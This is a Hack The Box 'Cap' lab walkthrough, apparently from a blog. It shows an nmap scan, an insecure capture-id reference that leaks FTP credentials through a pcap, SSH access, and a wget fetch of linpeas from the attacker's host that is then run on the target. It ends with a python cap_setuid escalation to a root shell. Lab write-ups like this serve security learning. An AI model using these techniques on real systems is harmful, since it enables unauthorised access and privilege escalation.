cap icon

Hack The Box – Cap – Complete Guide

cap icon

Info

The information provided on this site is intended for educational purposes only. While we strive to offer accurate and up-to-date content regarding hacking and security, we cannot be held responsible for any misuse or illegal activity conducted with the knowledge gained from this site. Users are solely responsible for their actions and should use this information ethically and within the boundaries of the law.

Enumeration

First we start with a nmap scan as usual.

Nmap Scan

nmap -sC -sV -p- --min-rate=1000 -Pn -oA Cap 10.10.10.245
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-14 15:57 -03
Nmap scan report for 10.10.10.245
Host is up (0.23s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa80a9b2ca3b8869a4289e390d27d575 (RSA)
|   256 96d8f8e3e8f77136c549d59db6a4c90c (ECDSA)
|_  256 3fd0ff91eb3bf6e19f2e8ddeb3deb218 (ED25519)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Fri, 14 Jul 2023 18:58:29 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Fri, 14 Jul 2023 18:58:22 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Fri, 14 Jul 2023 18:58:23 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, GET, HEAD
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
|     </body>
|_    </html>
|_http-title: Security Dashboard
|_http-server-header: gunicorn
<Snip>
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 208.57 seconds

Initial analysis

In this machine we have ports 21 and 22 opened, but, trying to log in to those services doesn’t seam to be successful, so there for, let’s check the HTTP server running:

Here we have some kind of network analysis dashboard with some information and some options that we can check. The first thing the caches my attention is that second option on the left menu, Security Snapshot, once we click on it, we can see that the page takes 5 seconds to load, which means that it’s probably taking a current snapshot of the network packages. We can confirm that by pinging the target and then click on the Security Snapshot option, once the page loads we can see all the packages send to it:


This is interesting but, how can this help us obtain access to the machine ? So, on the current URL, we can see the path as:


We could try to change that id that appears on the link for example, this could mean that we are able to see other people’s captures, therefor, we can get some information about the network. Let’s try id 0, 2, 3, 4, 5… util we get something that seems interesting.

On id 0 there is a big number of packages, let’s download it and see what this files is exactly. Downloading it we get a .pcap file, we can open those files with Wireshark, just open Wireshark, and go to file -> open -> select 0.pcap -> open, once opened we should see something like this:


This is a capture file, here we can see all the packages that was sent or received by the machine that captured the packages. If we got lucky, we can find some information leaked here. Scrolling down, we can see an FTP login attempt:


We can see that the communications with this ftp server wasn’t encrypted therefor, we can see the user and the password used clear as the day. So, therefor, we can just log in on the ftp just like we were the user. But, there is an ssh on this machine, we could try to log in with those credentials to log in on the ssh server.

Gaining Access

In fact, the ssh credentials are the same as the ftp, and now we have a shell. We can just get our user flag now:

┌──(atropos㉿Atropos)-[~]
└─$ ssh nathan@10.10.10.245
nathan@10.10.10.245's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Jul 26 11:04:19 UTC 2023

  System load:           0.0
  Usage of /:            36.6% of 8.73GB
  Memory usage:          20%
  Swap usage:            0%
  Processes:             223
  Users logged in:       0
  IPv4 address for eth0: 10.10.10.245
  IPv6 address for eth0: dead:beef::250:56ff:feb9:6fd

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Jul 26 11:03:33 2023 from 10.10.14.12
nathan@cap:~$ ls
user.txt

Privilege Escalation

Now for privilege escalation, the first thing I always try first is sudo -l, which doesn’t seam to work in this machine, so, we need a bigger gun. Now we are going to use linpeas.

Linpeas is a tool that automates information gathering on machines, so we can use this to get some useful information for privilege escalation. First let’s download it to our machine, we want to download the linpeas.sh file, and host it using python3 http.server:

┌──(atropos㉿Atropos)-[~/tmp]
└─$ ls
linpeas.sh

┌──(atropos㉿Atropos)-[~/tmp]
└─$ python3 -m http.server 80                               
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

So now that we have linpeas.sh on our server, we can download it on the machine using wget:

nathan@cap:~$ wget http://10.10.14.12/linpeas.sh
--2023-07-26 11:12:46--  http://10.10.14.12/linpeas.sh
Connecting to 10.10.14.12:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 676221 (660K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh                100%[====================================>] 660.37K   562KB/s    in 1.2s    

2023-07-26 11:12:47 (562 KB/s) - ‘linpeas.sh’ saved [676221/676221]

Now we just need to run the script and look for something useful in it:

nathan@cap:~$ chmod +x linpeas.sh
nathan@cap:~$ ./linpeas.sh

Looking in the linpeas output can be a daunting task, since this is a massive output with A LOT of information.

To easy out on ourselves we can scroll down looking for some red text with yellow background, as the legend says, this could be a potential privilege escalation:

Scrolling down a bit, we can find this:

This section describes files with capabilities, we can read more about capabilities here, but in basic terms, the capabilities are what a process can do in the system, on the man page on the link we can scroll down to have a more detailed description on cap_setuid:

CAP_SETUID
• Make arbitrary manipulations of process UIDs (setuid(2), setreuid(2), setresuid(2), setfsuid(2));
• forge UID when passing socket credentials via UNIX domain sockets;
• write a user ID mapping in a user namespace (see user_namespaces(7)).

So, python can manipulate it’s profess UID, that means we can change python to UID 0, and execute commands as root.

To exploit this we can open python3 and do the following:

nathan@cap:~$ python3
Python 3.8.5 (default, Jan 27 2021, 15:41:15) 
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
import os
os.setuid(0)
os.system("ls /root")
root.txt  snap
0
>>> 

Or we can create a python file and execute it:

import os
os.setuid(0)
os.system("/bin/bash")
nathan@cap:~$ ls
linpeas.sh  root.py  snap  user.txt
nathan@cap:~$ python3 root.py
root@cap:~# whoami
root
root@cap:~# ls /root
root.txt  snap

Now we just need to get our flag.

One response to “Hack The Box – Cap – Complete Guide”

  1. Thank you for your sharing. I am worried that I lack creative ideas. It is your article that makes me full of hope. Thank you. But, I have a question, can you help me?

Leave a Reply

Your email address will not be published. Required fields are marked *